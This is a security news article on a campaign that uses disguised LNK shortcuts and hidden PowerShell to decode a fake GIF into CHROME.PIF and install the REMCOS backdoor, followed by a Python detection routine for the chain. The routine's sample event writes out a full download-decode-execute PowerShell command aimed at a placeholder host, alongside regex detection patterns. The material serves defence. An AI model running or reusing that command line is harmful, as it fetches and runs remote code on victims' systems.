
A recent malware attack is utilizing LNK files to deploy the REMCOS backdoor on Windows systems.

In recent weeks, cybersecurity teams have detected a rise in malicious campaigns that exploit Windows shortcut (LNK) files to deploy sophisticated backdoors. These attacks cleverly disguise LNK shortcuts as harmless documents or folders, taking advantage of Windows’ default setting that hides known file extensions to mislead users. When executed, the shortcut silently invokes PowerShell with hidden window parameters, which fetches and decodes a Base64 payload that ultimately installs the REMCOS backdoor. The stealthy execution of this chain—utilising social engineering, fileless scripting, and living-off-the-land binaries—highlights the evolving tactics of threat actors targeting enterprise environments. Analysts from Point Wild have observed that the initial delivery often occurs through phishing emails, with attachments labelled as invoices or shipping documents. In some instances, threat actors embed these malicious shortcuts within ZIP or RAR archives on network shares, relying on casual browsing to trigger execution.

The infection mechanism relies on abusing LNK file properties to run malicious commands without raising user suspicion. Unlike Office macros, LNK files trigger no macro security warning, so execution proceeds seamlessly. When the victim double-clicks the LNK file, it silently launches powershell.exe with hidden-window parameters and directs the machine to download an obfuscated payload from a remote server. Point Wild researchers identified that the downloaded file carries a .GIF extension but actually contains Base64-encoded binary data.

The multi-stage workflow is driven by an embedded PowerShell script that retrieves the encoded text resource, writes it to C:\ProgramData\HEW.GIF, decodes it into a Windows PIF file named CHROME.PIF, and then executes that binary. The PIF file, disguised as a Chrome-themed program, relies on legacy support for MS-DOS shortcuts to bypass modern security warnings. Once launched, it drops additional artifacts, including a scheduled-task shortcut and a URL file, to ensure persistence and facilitate further payload execution.

The REMCOS backdoor grants attackers full remote control over compromised hosts, enabling arbitrary shell command execution, file transfer, keylogging, and even webcam capture. Victims often remain unaware of the breach, as the malware stores keystroke logs in C:\ProgramData\remcos\logs.dat and establishes encrypted channels with command-and-control servers located in Eastern Europe. The combination of stealthy execution and robust remote capabilities poses a significant risk to corporate networks, where lateral movement and data exfiltration can follow the initial compromise.
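As an added illustration (not code from Point Wild's report), a small Python triage routine over constructed Sysmon-style process-creation records that flags the chain described above: PowerShell spawned by explorer.exe, as a double-clicked LNK does, with a hidden window, a remote fetch, a Base64 decode and a ProgramData .GIF/.PIF drop in one command line. The event fields, sample command lines and the placeholder URL are all constructed.

```python
import re

# Constructed process-creation events (parent image, image, command line).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": ('powershell.exe -NoProfile -WindowStyle Hidden -Command '
                 '"Invoke-WebRequest http://PLACEHOLDER.invalid/a.txt '
                 '-OutFile C:\\ProgramData\\HEW.GIF; '
                 "[IO.File]::WriteAllBytes('C:\\ProgramData\\CHROME.PIF', "
                 "[Convert]::FromBase64String((Get-Content C:\\ProgramData\\HEW.GIF))); "
                 'Start-Process C:\\ProgramData\\CHROME.PIF"')},
    {"parent": r"C:\Windows\explorer.exe",          # benign admin script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\Scripts\\inventory.ps1"},
    {"parent": r"C:\Windows\System32\services.exe",  # unrelated service host
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# One regex per stage of the chain; "-w hidden" and "-WindowStyle Hidden" both count.
INDICATORS = [
    ("hidden_window",    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("remote_fetch",     re.compile(r"Invoke-WebRequest|DownloadString|DownloadFile|\biwr\b", re.I)),
    ("base64_decode",    re.compile(r"FromBase64String", re.I)),
    ("programdata_drop", re.compile(r'\\ProgramData\\[^\s"]+\.(?:gif|pif)', re.I)),
    ("pif_execution",    re.compile(r"\.pif\b", re.I)),
]


def analyze_event(event):
    """Return the names of the indicators that fire for one PowerShell event."""
    if not event["image"].lower().endswith("powershell.exe"):
        return []
    return [name for name, rx in INDICATORS if rx.search(event["cmdline"])]


def is_lnk_style_loader(event, threshold=3):
    """Flag PowerShell launched from explorer.exe with a hidden window when at
    least `threshold` stages of the download-decode-execute chain co-occur."""
    hits = analyze_event(event)
    from_explorer = event["parent"].lower().endswith("explorer.exe")
    return from_explorer and "hidden_window" in hits and len(hits) >= threshold


def triage(events):
    """Return the command lines of events that match the loader pattern."""
    return [e["cmdline"] for e in events if is_lnk_style_loader(e)]
```

Running `triage(SAMPLE_EVENTS)` returns only the first command line; the benign script and the service host produce no indicators.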
